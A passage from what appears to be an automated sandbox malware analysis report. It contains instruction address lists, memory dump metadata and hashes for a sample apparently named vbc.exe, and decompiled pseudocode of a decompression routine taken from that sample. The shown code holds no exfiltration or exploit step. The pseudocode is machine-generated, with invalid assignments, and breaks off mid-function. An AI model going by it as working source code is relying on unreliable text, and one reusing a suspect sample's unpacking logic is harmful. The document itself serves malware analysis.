                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00406745
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00000000
                          0x0040646a
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x00406548
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067b4
                          0x0040677d

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                          • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
